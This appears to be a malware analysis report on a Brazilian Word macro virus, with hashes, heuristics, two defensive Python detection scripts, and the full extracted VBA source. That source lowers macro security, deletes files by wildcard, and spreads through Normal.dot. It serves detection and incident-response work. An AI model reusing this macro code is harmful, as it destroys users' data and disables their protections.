Win.Trojan.Pivis-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 a5580a56192e7d20…

MALICIOUS

Office (OLE)

Size: 32.0 KB
Created: 2005-02-03 00:43:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: a15dee08b12b9a58f345a2234bf8737a
SHA-1: c99d11c4066ef1eb324c7c613282c65176304b9d
SHA-256: a5580a56192e7d20eda2aaa9bf121ca95bc8465823d20e6bb584cd5fe7221880
Risk Score: 260

Malware Insights

Win.Trojan.Pivis-2 · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1490 Inhibit System Recovery

The sample is a Word 2000 (Word 9.0) document whose VBA project consists of legacy WordBasic-style macros (AutoOpen, AutoClose and a Toolsmacro procedure that intercepts the Tools > Macro command), so it triggers both the modern VBA heuristics and the legacy WordBasic heuristic. AutoOpen switches off Word's virus protection and save prompts through the Options object, writes HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level = 1 (the lowest macro-security setting) through the registry form of System.PrivateProfileString, recolours Internet Explorer, and then issues WordBasic.Kill against wildcards under Program Files and My Documents (both the English and the Portuguese-locale paths) and several C:\WINDOWS subdirectories; on the 7th, 15th, 21st and 29th of any month it additionally deletes *.com, *.ini, *.txt and *.gif from C:\WINDOWS. AutoClose drops 145 copies of the infected document as C:\Windows\Virtual<n>.DOC and copies the Efine macro into the global template (Normal.dot), which is how it persists and infects later documents; the Toolsmacro procedure greys out the Security... entry of the Macro menu so the user cannot raise the setting again. The T1490 mapping reflects the destructive deletion; note that the persistence visible in the extracted source is via the Office global template, not a Run key or Startup folder, so the T1547.001 tag is not supported by the macro code itself.

Heuristics (5)

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen procedure present; Word runs it automatically when the document is opened
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    AutoClose procedure present (the listing's Sub AutoClose); Word runs it automatically when the document is closed
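The legacy WordBasic heuristic above keys on marker strings rather than on the VBA project, because Word 6/95 macros may sit outside the streams that olevba extracts. The following is an added example of that approach, written for this page and not the scanner's own code: it searches raw file bytes for auto-execution macro names and WordBasic-era statements in both 8-bit and UTF-16LE encodings and fires only when both kinds co-occur in an OLE container. The two input blobs are constructed for the demo, and the marker list is an assumption drawn from the heuristic's description.

```python
"""Scan raw Word/OLE bytes for legacy WordBasic auto-macro markers.

Added example, not the report's own tooling. It deliberately does not parse the
OLE container: olevba-style extraction reads the VBA project streams, and the
point of the OLE_LEGACY_WORDBASIC_MACRO_VIRUS heuristic is that Word 6/95
macros may live outside those streams. Marker strings are searched in both
8-bit and UTF-16LE encodings. The two sample blobs are constructed for the demo.
"""
import re

OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"   # compound-file signature

# Word auto-execution macro names (run on open/close/start/new/exit).
AUTO_EXEC = ("AutoOpen", "AutoClose", "AutoExec", "AutoNew", "AutoExit")
# WordBasic-era statements and names the heuristic keys on (assumed list).
WORDBASIC_MARKERS = ("ToolsMacro", "MacroCopy", "MacroFile", "fileMacro",
                     "globMacro", "WordBasic.", "Global:")


def _compile(words):
    """One case-insensitive pattern per marker, matching ASCII or UTF-16LE."""
    out = []
    for w in words:
        a = re.escape(w.encode("ascii"))
        u = re.escape(w.encode("utf-16-le"))
        out.append((w, re.compile(b"(?:" + a + b"|" + u + b")", re.IGNORECASE)))
    return out


_AUTO = _compile(AUTO_EXEC)
_WB = _compile(WORDBASIC_MARKERS)


def scan_legacy_markers(blob: bytes) -> dict:
    """Return which markers occur; the heuristic fires when an auto-exec name
    co-occurs with at least one WordBasic marker inside an OLE file."""
    auto = [name for name, pat in _AUTO if pat.search(blob)]
    wb = [name for name, pat in _WB if pat.search(blob)]
    is_ole = blob[:8] == OLE_MAGIC
    return {
        "is_ole": is_ole,
        "auto_exec": auto,
        "wordbasic": wb,
        "legacy_wordbasic_hit": is_ole and bool(auto) and bool(wb),
    }


# Constructed inputs: a fake OLE blob with markers in mixed encodings, and a clean one.
SAMPLE_SUSPECT = (OLE_MAGIC + b"\x00" * 32
                  + "AutoOpen".encode("utf-16-le") + b"\x00" * 8
                  + b"MacroCopy" + b"\x00" * 8 + b"Global:Efine")
SAMPLE_BENIGN = OLE_MAGIC + b"\x00" * 32 + "Quarterly report".encode("utf-16-le")

if __name__ == "__main__":
    for label, blob in (("suspect", SAMPLE_SUSPECT), ("benign", SAMPLE_BENIGN)):
        print(label, scan_legacy_markers(blob))
```

Because the scan works on raw bytes it also covers strings sitting in the WordDocument stream or in slack space; the price is false positives on documents that merely discuss these names, so treat a hit as a triage signal to be confirmed by macro extraction, as the report does here.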

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3655 bytes
SHA-256: 728cb131215c7fd1dd2d9cc3f747ed2b76c47510af05bb4fc49d128eec9f8b2e
Detection
ClamAV: Doc.Trojan.Efin-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Efine"
'Virus: Defino
'Escrito por : Brasileiro.        ' [translation: Written by: Brasileiro ("Brazilian")]
'=========================
'Brasil 2005                      ' [translation: Brazil 2005]
'-------------------------

Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Macro virus Defino"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.Efine.AutoOpen"
On Error Resume Next
With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
   End With
Application.Caption = UserName & ">==================Virus word macro====================="

' An empty first argument makes PrivateProfileString write the registry rather than an .ini file:
' sets Word 2000's macro security (HKCU\...\Office\9.0\Word\Security\Level) to 1, i.e. "Low".
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings", "Anchor Color") = " 139,69,19" ' Brown
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings", "Anchor Color Visited") = " 255,255,0" ' Yellow
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings", "Background Color") = " 0,0,255" ' Blue
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings", "Text Color") = " 255,0,0" 'Red
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings", "Use Anchor Hover Color") = " yes"

' Destructive payload: WordBasic.Kill deletes every file matching the wildcard.
' "Arquivos de programas" and "Meus Documentos" are the Portuguese-locale names
' of Program Files and My Documents, so both locales are targeted.
WordBasic.Kill "C:\Arquivos de programas\*.*"
WordBasic.Kill "C:\Program Files\*.*"
WordBasic.Kill "C:\My Documents\*.*"
WordBasic.Kill "C:\Meus Documentos\*.*"
WordBasic.Kill "C:\WINDOWS\Command\*.*"
WordBasic.Kill "C:\WINDOWS\Temp\*.*"
WordBasic.Kill "C:\WINDOWS\Help\*.*"
WordBasic.Kill "C:\WINDOWS\Fonts\*.*"
MsgBox " Virus fez uma limpeza!", vbOKOnly + vbCritical, " Macro virus informa!!"   ' [translation: "Virus did a clean-up!" / "Macro virus informs!!"]

If Day(Now()) = 7 Or (Day(Now)) = 15 Or (Day(Now)) = 21 Or (Day(Now)) = 29 Then   ' calendar trigger: 7th, 15th, 21st and 29th of any month
MsgBox " Virus deletou arquivos!!", vbOKOnly + vbCritical, "Virus esclarece!!"   ' [translation: "Virus deleted files!!" / "Virus clarifies!!"]
WordBasic.Kill "C:\WINDOWS\*.com"
WordBasic.Kill "C:\WINDOWS\*.ini"
WordBasic.Kill "C:\WINDOWS\*.txt"
WordBasic.Kill "C:\WINDOWS\*.gif"

End If
End Sub

Sub AutoClose()
Attribute AutoClose.VB_Description = "Macro virus Defino"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Project.Efine.AutoClose"
On Error Resume Next

    ChangeFileOpenDirectory "C:\Windows\"
    ' Drops 145 copies of the infected document as C:\Windows\Virtual1.DOC .. Virtual145.DOC
    For i = 1 To 145
        ActiveDocument.SaveAs FileName:=("Virtual" & i & ".DOC")
    
    Next
' Re-infection check: walks the macros of the global template (context 0) looking for "Efine".
' Both branches test the same name, so bTooMuchTrouble can never differ from binstalled (author's bug, left as found).
iMacroCount = WordBasic.CountMacros(0, 0)
For i = 1 To iMacroCount
    If WordBasic.[MacroName$](i, 0, 0) = "Efine" Then
        binstalled = -1
    End If
    If WordBasic.[MacroName$](i, 0, 0) = "Efine" Then
        bTooMuchTrouble = -1
    End If
Next i
If Not binstalled And Not bTooMuchTrouble Then
    sMe$ = WordBasic.[FileName$]()
    sMacro$ = sMe$ + ":Efine"
    ' Persistence: copies the virus module into the global template (Normal.dot) so it runs in every later document.
    WordBasic.MacroCopy sMacro$, "Global:Efine"
    sMacro$ = sMe$ + ":AutoClose"
    ' The second copy reuses the destination name "Global:Efine" instead of "Global:AutoClose" (as found).
    WordBasic.MacroCopy sMacro$, "Global:Efine"
    
End If

End Sub

Sub Toolsmacro()
Attribute Toolsmacro.VB_Description = "Macro virus Defino"
Attribute Toolsmacro.VB_ProcData.VB_Invoke_Func = "Project.Efine.macro"
On Error Resume Next
' A procedure named after the built-in Tools > Macro command replaces it; here it greys out
' the Security... item so the user cannot raise the macro-security level from the menu.
CommandBars("Macro").Controls("Security...").Enabled = False
End Sub



'Infecta documentos word.
'Infect word documents.
'<><>Word Macro virus<><>
'=========================
'Ano 2005 - Brasil                ' [translation: Year 2005 - Brazil]
'-------------------------
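The listing above is short enough to read by hand, but the same indicators (auto-execution entry points, registry writes through the registry form of System.PrivateProfileString, WordBasic.Kill targets, MacroCopy into the global template, and calendar triggers) recur across this family and are what an analyst carries into an IR ticket. The following is an added example, not the report's analysis code: a small regex-based triage pass over decoded macro source. MACRO_SRC is a constructed excerpt modelled on the listing, not the carved macros.bas artifact, and the function and pattern names are this example's own.

```python
"""Behavioural triage of extracted Word macro source.

Added example, not the report's own analysis code. Given decoded VBA text like
the listing above, it extracts auto-execution entry points, registry writes made
through the registry form of System.PrivateProfileString (empty filename),
WordBasic.Kill deletion targets, MacroCopy into the global template, and
calendar triggers. MACRO_SRC is a constructed excerpt modelled on the listing,
not the carved artifact itself.
"""
import re

MACRO_SRC = r'''
Sub AutoOpen()
On Error Resume Next
With Options
        .VirusProtection = False
   End With
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings", "Text Color") = " 255,0,0"
WordBasic.Kill "C:\Program Files\*.*"
WordBasic.Kill "C:\WINDOWS\Temp\*.*"
If Day(Now()) = 7 Or (Day(Now)) = 15 Then
WordBasic.Kill "C:\WINDOWS\*.ini"
End If
End Sub

Sub AutoClose()
    WordBasic.MacroCopy sMacro$, "Global:Efine"
End Sub
'''

AUTO_PROC = re.compile(r"^\s*Sub\s+(Auto(?:Open|Close|Exec|New|Exit))\s*\(", re.I | re.M)
DISABLE_PROT = re.compile(r"\.VirusProtection\s*=\s*False", re.I)
# An empty first argument means PrivateProfileString targets the registry, not an .ini file.
REG_WRITE = re.compile(r'PrivateProfileString\(\s*""\s*,\s*"([^"]+)"\s*,\s*"([^"]+)"\s*\)\s*=\s*(.+?)\s*$', re.M)
KILL = re.compile(r'WordBasic\.Kill\s+"([^"]+)"', re.I)
MACROCOPY = re.compile(r'MacroCopy\s+[^,]+,\s*"(Global:[^"]+)"', re.I)
DAY_TRIGGER = re.compile(r"Day\(Now\(?\)?\)\)?\s*=\s*(\d+)")


def triage(src: str) -> dict:
    """Collect behavioural indicators from decoded macro source."""
    return {
        "auto_exec": AUTO_PROC.findall(src),
        "disables_virus_protection": bool(DISABLE_PROT.search(src)),
        "registry_writes": REG_WRITE.findall(src),        # (key path, value name, assigned literal)
        "kill_targets": KILL.findall(src),
        "global_template_copies": MACROCOPY.findall(src),
        "trigger_days": sorted({int(d) for d in DAY_TRIGGER.findall(src)}),
    }


def lowers_macro_security(report: dict) -> bool:
    """True if any registry write targets Word's Security\\Level value."""
    return any(path.endswith(r"\Word\Security") and name == "Level"
               for path, name, _ in report["registry_writes"])


if __name__ == "__main__":
    r = triage(MACRO_SRC)
    for k, v in r.items():
        print(f"{k}: {v}")
    print("lowers macro security:", lowers_macro_security(r))
```

The registry key path and the Kill wildcards come out as ready-made host IOCs; the trigger days tell the responder that a sandbox run on a non-trigger date will not show the second deletion stage.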